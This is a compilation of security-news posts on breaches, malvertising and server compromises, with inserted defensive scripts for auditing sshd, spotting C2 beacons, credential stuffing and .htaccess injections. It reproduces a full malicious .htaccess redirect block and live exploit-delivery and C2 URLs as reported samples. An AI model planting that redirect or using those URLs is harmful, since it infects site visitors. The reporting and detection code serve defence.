
Secure your Home Server from being used as a Hacking Server by Crooks


SSH, also referred to as Secure Shell, is a cryptographic network protocol that secures remote login from one computer to another. It is employed by almost all Linux sysadmins, and although Windows users are more acquainted with Remote Desktop Protocol (RDP), many Windows sysadmins also use SSH instead of RDP because of its raw power.

RDP gives its users full graphical remote control of a Windows computer, with access to the regular Windows desktop through keyboard and mouse. SSH, which is comparatively more generic, allows the user to run almost any program remotely, which in turn lets them administer the system from a distance, either automatically through pre-written scripts or by entering commands live, or both at once.

As a result, cybercriminals who somehow get hold of a user's SSH password can also access that user's system, if not the entire network.

Network tunneling is another feature provided by SSH: users build an encrypted network connection from one computer to another and extend that connection to a third system to carry out their online work.

An SSH server can also act as a special-purpose VPN or encrypting proxy, allowing users to redirect their network traffic through it while they are on the go.

Therefore, criminals who have a user's SSH password can use that user's server as the base for their future attacks, and the victims of those attacks will blame the owner of the server.

Unfortunately, many people have an SSH server at home without realizing it, because home routers ship with a pre-configured SSH server placed there for administrative reasons.

When attacking, cybercriminals do not differentiate between SSH servers managed by users themselves and those managed by their ISPs; they exploit either regardless, since these servers can potentially allow them to breach data and profit by reselling it.

Users are advised to take the time to understand and get familiar with their router's configuration settings, in cases where it is not managed by the ISP. Furthermore, turn off all the features you don't require, and also the ones you are not certain about. Lastly, ensure that you are running the latest version.
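A defender-side check for the advice above, added here as an example rather than taken from the original post: it parses the effective OpenSSH server configuration ("sshd -T" output, which prints every option in lowercase) and flags the remote-login and tunneling features the post says to turn off. The sample output is constructed; the option names are real sshd_config keywords, and routers running other SSH daemons (for example Dropbear) will not have "sshd -T".

```python
# Options a home server rarely needs: option -> (safe value, what it would allow).
# Names are real sshd_config keywords, lowercased as `sshd -T` prints them.
RISKY = {
    "permitrootlogin": ("no", "direct root login over SSH"),
    "passwordauthentication": ("no", "password guessing instead of key auth"),
    "allowtcpforwarding": ("no", "using the box as a tunnel/proxy to third systems"),
    "gatewayports": ("no", "exposing forwarded ports to the whole internet"),
    "permittunnel": ("no", "layer-2/3 VPN tunnels through the server"),
    "x11forwarding": ("no", "X11 forwarding, rarely needed on a server"),
    "permitemptypasswords": ("no", "logins to accounts with empty passwords"),
}

# Constructed sample of `sshd -T` output for a loosely configured server.
SAMPLE_SSHD_T = """\
port 22
permitrootlogin yes
passwordauthentication yes
allowtcpforwarding yes
gatewayports no
permittunnel no
x11forwarding no
permitemptypasswords no
"""


def parse_sshd_t(text):
    """Turn `sshd -T` output into a dict of lowercase option -> value."""
    conf = {}
    for line in text.splitlines():
        parts = line.split(None, 1)
        if len(parts) == 2:
            conf[parts[0].lower()] = parts[1].strip()
    return conf


def audit_sshd(text):
    """Return a sorted list of (option, current, recommended, reason) for every
    risky option whose effective value differs from the recommended one.
    An option missing from `sshd -T` output is reported as "<unset>"."""
    conf = parse_sshd_t(text)
    findings = []
    for opt, (safe, why) in RISKY.items():
        current = conf.get(opt, "<unset>")
        if current.lower() != safe:
            findings.append((opt, current, safe, why))
    return sorted(findings)


if __name__ == "__main__":
    import sys
    # Usage: sshd -T > effective.conf && python audit.py effective.conf
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_SSHD_T
    for opt, current, safe, why in audit_sshd(text):
        print(f"{opt} = {current} (recommend {safe}): allows {why}")
```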




Hackers abusing Microsoft Azure to deploy malware

Microsoft Azure has now become a sweet spot for hackers to host powerful malware and to serve as a command and control server for sending commands to, and receiving data from, compromised systems.

Microsoft Azure is a cloud computing platform created by Microsoft for building, testing, deploying, and managing applications and services through Microsoft-managed data centers.

This malicious operation was initially uncovered and reported by @JayTHL and @malwrhunterteam via Twitter, where they provided evidence that malicious software was being hosted on Microsoft Azure.

Researchers had already reported this malicious operation to Microsoft; however, the original malware (plus additional samples uploaded since) still resided on the Azure site as of May 29, 2019, 17 days later, AppRiver reported.

This is evidence that Azure failed to detect the malware residing on Microsoft's own servers, even though Windows Defender does detect the malicious files if users attempt to download them from the malware-hosting site.

Windows Defender detects this malware as Trojan:Win32/Occamy.C. The first sample (searchfile.exe) was initially uploaded to VirusTotal on April 26, 2019, and another sample (printer/prenter.exe) was first submitted on April 30; both still remain undetected on the Azure servers.

According to AppRiver, however, it does not appear that the service is currently scanning Azure sites, or one could surmise that these files would have been detected by now.

Based on the analysis report on the printer.exe file, the attackers shipped this malware as an uncompiled C# .NET portable executable file.

The attackers cleverly use an uncompiled file in an attempt to evade gateway and endpoint security products that detect threats by thoroughly examining downloaded binaries.

Once running, this malicious agent generates XML SOAP requests every 2 minutes to check in and receive commands from the malicious actor's Azure command and control site at systemservicex[.]azurewebsites[.]net/data[.]asmx.

This is not the first time a malware operator has abused Azure; we already reported that attackers abused Microsoft Azure Blob hosting in an attempt to steal login credentials.
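The check-in pattern described above (a fixed 2-minute poll to a single host) can be caught in proxy logs by interval analysis. The following is an added example, not AppRiver's analysis code or the malware's; the log format, the client address and all timestamps are constructed, and only the C2 hostname comes from the post.

```python
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev

# Constructed proxy log lines: "<ISO time> <client> <method> <host> <path>".
# The C2 host is the one named in the post; the client and times are made up.
SAMPLE_LOG = """\
2019-05-29T10:00:03Z 10.0.0.5 POST systemservicex.azurewebsites.net /data.asmx
2019-05-29T10:00:41Z 10.0.0.5 GET www.example.com /
2019-05-29T10:02:04Z 10.0.0.5 POST systemservicex.azurewebsites.net /data.asmx
2019-05-29T10:04:03Z 10.0.0.5 POST systemservicex.azurewebsites.net /data.asmx
2019-05-29T10:05:17Z 10.0.0.5 GET www.example.com /news
2019-05-29T10:06:02Z 10.0.0.5 GET www.example.com /about
2019-05-29T10:06:05Z 10.0.0.5 POST systemservicex.azurewebsites.net /data.asmx
2019-05-29T10:08:03Z 10.0.0.5 POST systemservicex.azurewebsites.net /data.asmx
"""


def parse_log(text):
    """Yield (timestamp, client, host, path) from the constructed log format."""
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, client, _method, host, path = line.split()
        yield datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"), client, host, path


def find_beacons(text, min_hits=4, max_jitter=0.1):
    """Return {(client, host): period_seconds} for hosts a client contacts at a
    near-constant interval.  Jitter is the standard deviation of the gaps
    between requests divided by their mean; human browsing is far noisier than
    a timer-driven check-in, so a low ratio over enough hits is a beacon."""
    stamps = defaultdict(list)
    for ts, client, host, _path in parse_log(text):
        stamps[(client, host)].append(ts)
    beacons = {}
    for key, times in stamps.items():
        if len(times) < min_hits:
            continue
        times.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        period = mean(gaps)
        if period > 0 and pstdev(gaps) / period <= max_jitter:
            beacons[key] = round(period)
    return beacons


if __name__ == "__main__":
    for (client, host), period in find_beacons(SAMPLE_LOG).items():
        print(f"{client} -> {host} every ~{period}s (possible C2 check-in)")
```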

North Korea hacked Email Accounts of Information Security School Students


Hackers broke into an information security school's server and compromised the email accounts of alumni. The National Intelligence Service (NIS) investigated and found that North Korea was behind this attack. According to the report, they hacked the e-mail accounts of 27 students of Korea University's Graduate School of Information Security.

"Analysis of the malware used to hack into the e-mail accounts confirmed that it is identical to malicious codes spread by North Korea," an NIS official said Wednesday. "We have tentatively concluded that North Korean hackers were behind the attack and are tracking the source."

The hackers sent spam mail carrying malware to alumni via the Korea University Center for Information Security Technologies. The investigation revealed that all of those who received it graduated in the same year. It appears that the hackers obtained the directory with all their email addresses and planted the malicious code.

The reason North Korea tried to hack into the e-mail accounts, intelligence officials believe, is that most of the school's graduates get jobs at the Defense Ministry, the NIS or other government security agencies.

SSL Certificate Authority KPN stopped issuing certificates

SSL (Secure Sockets Layer) certificate authority KPN stopped issuing certificates after a DDoS tool was detected on one of its servers. KPN is a Netherlands-based SSL certificate provider. They found the DDoS tool on their server during a security audit; the tool may have been there for as long as four years.
"Although there is no evidence that the production of certificates was compromised, it cannot be completely excluded that this happened. Therefore, KPN Corporate Market (formerly Getronics) has decided to temporarily discontinue the application for and issuance of new certificates, pending further investigation. This is to ensure that the procedure by which certificates are issued is safe and reliable.

KPN has replaced the web servers. An additional, independent investigation is taking place to ensure that KPN complies with the required safeguards, procedures and rules applicable to the issuance of Internet safety certificates. The Interior Ministry and Logius, the e-government agency, are closely involved in the process," KPN said in its official statement (translated to English).

Previously, another Dutch certificate authority, DigiNotar, was compromised by an unknown attacker who issued a huge number of fraudulent but valid certificates for high-value domains, including some belonging to Google, Yahoo, the CIA and others. As a result DigiNotar went out of business and KPN gained new customers from DigiNotar. But now KPN's server has been breached.



Hackers breached MIT Server to launch cyber attack on other sites


Hackers compromised an MIT (Massachusetts Institute of Technology) server in order to launch cyber attacks on other sites.

"One MIT server (CSH-2.MIT.EDU) hosts a malicious script actively used by cyber-crooks to scan the web for vulnerable websites," BitDefender Researchers said.

The malicious script searched for vulnerable installations of phpMyAdmin, a popular Web-based database administration tool.

phpMyAdmin is used by web developers and site administrators to connect to a database and perform specific SQL operations over the web, such as creating, reading, updating and deleting information in the database. Our information shows that the vulnerable versions of phpMyAdmin range from 2.5.6 to 2.8.

Once it finds a vulnerable version of phpMyAdmin, it launches an SQL injection attack to gain admin privileges. If the website is successfully compromised, the crawler leaves behind a folder called "muieblackcat", a mutex that acts as a mark of infection (Blackhole Exploit Pack).

BitDefender said that it tried to alert MIT about the security breach on their server, but received no reply.

According to the BitDefender report the server is still online, but no longer attacks any sites. "As a top-level reliable domain, .edu is primarily used by educational institutions in America and other trustworthy organizations. A trackback from such a domain is a vote of confidence for an article, a blog, an entire site, or even an institution. In short, an infrastructure the size of MIT.edu is not only guaranteed to have huge bandwidth to carry thousands of malicious requests per second, but is also a good way to evade firewalls that obviously accept traffic from MIT.edu as legit," said Doina Cosovan, BitDefender Virus Analyst.


Japanese parliament's computers infected by Virus in a Cyber Attack


The Japanese Parliament's computers were infected by a virus. This gave hackers access, and they stole confidential data belonging to 480 lawmakers and their staff over a period of more than a month.

As per the report, their servers were infected after a Trojan horse was emailed to a Lower House member in July. This Trojan horse downloaded malware from a China-based server. The malware spied on email communication, stole confidential data of lawmakers and sent it to the attacker.

Last month, Mitsubishi (Japan's biggest defense contractor) had a server compromised and confidential data stolen, such as data relating to fighter jets, as well as nuclear power plant design and safety plans.

KickAssTorrents(Kat.ph) infected and serving malware through Malvertising

The OpenX ad platform of the famous torrent website KickAssTorrents (kat.ph, Alexa rank 321) was compromised and served a fake antivirus, "Security Sphere 2012", through malvertising (malicious advertising), as detected by Armorize. When a user clicks the ad, it redirects to a fake page that infects the user without their knowledge.


Coincidentally, KickAss Torrents published a blog post on Oct 10th in response to the website being flagged by antivirus vendor Avast. In it they said:
===================
Our users that are using the Avast anti-virus might have noticed that KAT.ph suddenly became labeled as a dangerous website for users that are not logged in. We want to assure our users that KickassTorrents has no malware or viruses of any kind and it is absolutely safe to use our website. We already contacted Avast and currently we are trying to find and fix the cause of this problem. You will help us if you choose the "Report the file as a false positive" option if you get the alert.
===================

In another thread, KickAss Torrents said:

===================
Now what the hell does this error mean?
First of all, don't flip out, don't go post on the KAT site, post down here if you experience the same problem.
Secondly, report down here if you experience this error.
Thirdly, add kat.ph to the safe URLs in your AV.
And lastly, please go to this site and report the problem (Avast! users only):
Avast! forum thread
Back on topic. What is this error? This error roughly means that your anti-virus software has found some bad code in an iFrame. This could be from the site itself, or from advertisements. An iFrame is a piece of code that allows you to do several things. Embedding something in your site is a good example.
I hope this topic helps a little and I certainly hope the error is going to be fixed now.
Q&A:
Q: OMFG IS KAT HACKED?
A: Nope, just some error.
Q: Is it really safe to visit KAT?
A: Yes, it is.
===================
KickAss Torrents also referred to this discussion thread on Avast's forum. At the end of the thread it appears that Avast acknowledged that it was indeed a false positive and addressed the issue:

===================
Hello,

It should be solved, if not let us know please.

Miroslav Jenšík
AVAST Software a.s.
===================

Well, that time it may have been a false positive from Avast, but this time the website is definitely infecting its visitors, as seen in our video.


The attacker injected the malicious script using the following url:
http://ad.kat.ph/delivery/ajs.php?zoneid=4&target=_blank&charset=UTF-8&cb=95920847237&charset=UTF-8&loc=http%3A//www.kat.ph/&section=1939940

At the time of detection, only 2 out of 42 engines detected the malware in the VirusTotal analysis.

According to Armorize, this attacker is also responsible for the speedtest.net incident.

The attacker uses DynDNS domains for the exploit server. Domain names are auto-calculated using JavaScript. The algorithm generates a (predictable) different dyndns.tv domain name every hour, in the format roboABCD.tv, where ABCD are characters derived from a fixed seed and incremented by one character every UTC hour.

The new DynDNS domain for the next hour is generated every hour precisely at minutes 2 to 5, so this is probably done by an automated mechanism.

All generated domains resolve to a single IP: 184.22.224.154 (AS21788, Scranton Network Operations Center Inc), located in the US.

The domain obama-president.com resolves to this IP and serves the same exploit pack. This domain was registered on Aug 4th through a Russian registrar, 1'ST DOMAIN NAME SERVICE (www.1dns.ru). At that time the domain resolved to a Netherlands IP, 85.17.93.9. The domain started to resolve to 184.22.224.154 on Aug 23rd. This IP and the president-obama.com domain are both currently still up and working.

This video shows how users get infected:



Sony Playstation Hacked Again - 93,000 accounts compromised

Sony's security officer reported that they detected attempts on the Sony Entertainment Network, PlayStation Network and Sony Online Entertainment ("Networks") services to test a massive set of sign-in IDs and passwords against their network database.

These attempts appear to include a large amount of data obtained from one or more compromised lists from other companies, sites or other sources. In this case, given that the data tested against their network consisted of sign-in ID-password pairs, and that the overwhelming majority of the pairs resulted in failed matching attempts, it is likely the data came from another source and not from their Networks. They have taken steps to mitigate the activity.

Less than one tenth of one percent (0.1%) of our PSN, SEN and SOE audience may have been affected. There were approximately 93,000 accounts globally (PSN/SEN: approximately 60,000 accounts; SOE: approximately 33,000) where the attempts succeeded in verifying those accounts’ valid sign-in IDs and passwords, and we have temporarily locked these accounts. Only a small fraction of these 93,000 accounts showed additional activity prior to being locked.

The full update is here: Sony hacked
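The activity Sony describes has a recognisable shape in sign-in logs: one source tries many distinct sign-in IDs about once each, the overwhelming majority fail, and the few successes are the accounts to lock. The following detection is an added example, not Sony's code; the log format, addresses and sign-in IDs are constructed.

```python
from collections import defaultdict

# Constructed sign-in log: "<ISO time> <source_ip> <sign_in_id> <OK|FAIL>".
# 203.0.113.9 replays a leaked ID/password list; the other two are normal users.
SAMPLE_AUTH_LOG = """\
2011-10-11T08:00:01Z 203.0.113.9 alice FAIL
2011-10-11T08:00:01Z 203.0.113.9 bob FAIL
2011-10-11T08:00:02Z 203.0.113.9 carol OK
2011-10-11T08:00:02Z 203.0.113.9 dave FAIL
2011-10-11T08:00:03Z 203.0.113.9 erin FAIL
2011-10-11T08:00:03Z 203.0.113.9 frank FAIL
2011-10-11T08:00:04Z 203.0.113.9 grace FAIL
2011-10-11T08:00:04Z 203.0.113.9 heidi OK
2011-10-11T08:00:05Z 203.0.113.9 ivan FAIL
2011-10-11T08:00:05Z 203.0.113.9 judy FAIL
2011-10-11T08:01:10Z 198.51.100.4 mallory FAIL
2011-10-11T08:01:35Z 198.51.100.4 mallory OK
2011-10-11T08:02:00Z 192.0.2.7 oscar OK
"""


def parse_auth_log(text):
    """Yield (source_ip, sign_in_id, succeeded) from the constructed format."""
    for line in text.splitlines():
        if line.strip():
            _ts, src, user, result = line.split()
            yield src, user, result == "OK"


def find_stuffing_sources(text, min_ids=8, max_success_rate=0.5):
    """Return {source_ip: {"tried": distinct_ids, "compromised": [ids]}} for
    sources that tested at least min_ids distinct sign-in IDs with a success
    rate at or below max_success_rate.  A user mistyping their own password
    retries one ID, so it never reaches min_ids; a list stolen from this very
    service would mostly succeed, so it fails the rate test instead."""
    per_src = defaultdict(lambda: {"ids": set(), "ok": [], "attempts": 0})
    for src, user, ok in parse_auth_log(text):
        rec = per_src[src]
        rec["ids"].add(user)
        rec["attempts"] += 1
        if ok:
            rec["ok"].append(user)
    flagged = {}
    for src, rec in per_src.items():
        rate = len(rec["ok"]) / rec["attempts"]
        if len(rec["ids"]) >= min_ids and rate <= max_success_rate:
            flagged[src] = {"tried": len(rec["ids"]),
                            "compromised": sorted(rec["ok"])}
    return flagged


if __name__ == "__main__":
    for src, info in find_stuffing_sources(SAMPLE_AUTH_LOG).items():
        print(f"{src}: tried {info['tried']} IDs, lock {info['compromised']}")
```

In production the per-source grouping would run over a sliding time window and also be aggregated per network, since such lists are usually replayed from many addresses at once.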

Online Virus Removal Site infected by malware, infects visitors' machines


The online virus removal website laptopvirusrepair.co.uk was infected by malware and serves malware to visitors' systems. This site offers to pick up your infected laptop, clean it and then ship it back to you for a fee.

The infection is an obfuscated iframe that redirects to a site that delivers exploits: zdesestvareznezahodi.com/tds/go.php?sid=1
The site is listed on the malwareblacklist website.



Before considering other people's laptop security, they must consider their own server security. Now most of their users have been affected by malware. Gaining their trust again will not be easy.

 

GoDaddy shared servers compromised – .htaccess redirection to sokoloperkovuskeci.com

Many sites hosted on GoDaddy shared servers are getting compromised today (and have been for the last few days) with a conditional redirection to sokoloperkovuskeci.com.

After scanning a website with the sucuri.net tool, the researcher got this result:
Suspicious conditional redirect.
Details: http://sucuri.net/malware/entry/MW:HTA:7
Redirects users to:http://sokoloperkovuskeci.com/in.php?g=1105


This is caused by the following entry, which is added to the .htaccess file of the compromised sites:
RewriteEngine On
RewriteOptions inherit
RewriteCond %{HTTP_REFERER} .*ask.com.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*bing.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*live.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*excite.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*search.yahoo*$ [NC]
RewriteRule .* http://sokoloperkovuskeci.com/in.php?g=916 [R,L]

What is going on?

These redirection attacks are very common on outdated WordPress and Joomla sites, but this time (and for this specific malicious domain) the target is GoDaddy-hosted sites.


What happens to anyone visiting these hacked sites?

The malware checks whether a visitor to the infected site is coming from a Google search (or Yahoo, or Bing) and, if so, redirects them to that domain (sokoloperkovuskeci.com). From there, the user is redirected again to other locations that infect their browser. So you have to fix your site ASAP to protect your own users.

Check whether your site is infected by malware or compromised:
http://sitecheck.sucuri.net/
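To find this entry on your own hosting account rather than waiting for a remote scan, the following added example (not Sucuri's scanner) parses .htaccess files for the tell-tale shape: RewriteCond lines on HTTP_REFERER naming search engines, followed by a RewriteRule whose target is an absolute URL on another host. The sample .htaccess content and the own_host value are constructed; only the redirect target and referer patterns are taken from the entry above.

```python
import os
import re
from urllib.parse import urlparse

# Referer substrings the injected block keys on (taken from the entry above).
SEARCH_ENGINES = ("ask.com", "google", "msn.com", "bing.com", "live.com",
                  "aol.com", "altavista.com", "excite.com", "search.yahoo")

# Constructed .htaccess sample with the same shape as the injected entry.
INFECTED = """\
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*search.yahoo*$ [NC]
RewriteRule .* http://sokoloperkovuskeci.com/in.php?g=916 [R,L]
"""

COND_RE = re.compile(r"^\s*RewriteCond\s+%\{HTTP_REFERER\}\s+(\S+)", re.I)
RULE_RE = re.compile(r"^\s*RewriteRule\s+\S+\s+(https?://\S+)", re.I)


def find_conditional_redirects(htaccess_text, own_host):
    """Return [(target_url, [referer_patterns])] for every RewriteRule whose
    target is an absolute URL on another host (mod_rewrite treats that as an
    external redirect even without [R]) and which is gated on HTTP_REFERER
    conditions naming a search engine.  own_host is the site's own hostname."""
    findings, pending = [], []
    for line in htaccess_text.splitlines():
        cond = COND_RE.match(line)
        if cond:
            pending.append(cond.group(1))
            continue
        rule = RULE_RE.match(line)
        if rule:
            target = rule.group(1)
            engine_gated = any(e in p.lower() for p in pending for e in SEARCH_ENGINES)
            if engine_gated and urlparse(target).hostname != own_host:
                findings.append((target, pending))
            pending = []
        elif line.strip() and not line.lstrip().startswith("#"):
            pending = []  # any other directive ends a RewriteCond chain
    return findings


def scan_tree(root, own_host):
    """Walk a document root and report suspicious .htaccess files by path."""
    report = {}
    for dirpath, _dirs, files in os.walk(root):
        if ".htaccess" in files:
            path = os.path.join(dirpath, ".htaccess")
            with open(path, encoding="utf-8", errors="replace") as fh:
                hits = find_conditional_redirects(fh.read(), own_host)
            if hits:
                report[path] = hits
    return report
```

A clean HTTPS redirect to your own hostname is not reported, because its target host matches own_host and it carries no referer condition.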